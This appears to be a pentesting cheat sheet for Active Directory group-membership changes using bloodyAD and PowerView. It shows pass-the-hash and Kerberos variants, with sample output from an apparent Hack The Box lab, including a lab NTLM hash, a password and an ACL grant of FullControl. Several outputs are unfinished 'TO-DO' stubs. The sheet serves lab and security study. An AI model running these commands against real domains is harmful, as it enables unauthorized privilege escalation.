Authentication Method
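Add User to Group
Note: with security group management auditing enabled, the DC Security log records each membership change (event 4728/4732/4756 for an add and 4729/4733/4757 for a removal, depending on group scope), so every add or remove below leaves an audit trail.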
1. Add User to Group
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
2. Check (the added account should appear in the group's member attribute)
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
Ref: bloodyAD
1. Connect
# Password
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Password-based Kerberos
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Ticket-based Kerberos (the sample run below additionally passes --no-pass)
powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
2. Add User to Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
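Sample Output (this capture shows Add-DomainObjectAcl granting FullControl on the group, not the Add-DomainGroupMember command above):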
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
[2025-10-31 22:23:23] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112
[2025-10-31 22:23:23] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb
3. Check
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Get-DomainGroupMember -Identity 'Support_Services'
GroupDomainName : Support_Services
GroupDistinguishedName : CN=Support_Services,CN=Users,DC=haze,DC=htb
MemberDomain : haze.htb
MemberName : Haze-IT-Backup$
MemberDistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
MemberSID : S-1-5-21-323145914-28650650-2368316563-1111
Ref: powerview.py
1. Import PowerView
. .\PowerView.ps1
Sample Output:
evil-winrm-py PS C:\programdata> . .\PowerView.ps1
2. Add User to the Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output:
evil-winrm-py PS C:\programdata> Add-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
3. Check
Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> | fl MemberName
Sample Output:
evil-winrm-py PS C:\programdata> Get-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Domain haze.htb -DomainController dc01.haze.htb | fl MemberName
MemberName : Haze-IT-Backup$
Remove User from Group
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# powerview.py session (PV prompt, as in the sample output below)
Remove-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Administrator]-[NS:<auto>]
╰─PV ❯ Remove-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
[2025-11-01 01:07:02] User haze-it-backup$ successfully removed from SUPPORT_SERVICES
1. Import PowerView.ps1
. .\PowerView.ps1
Sample Output:
TO-DO
2. Remove User from Group
Remove-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
evil-winrm-py PS C:\programdata> Remove-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
True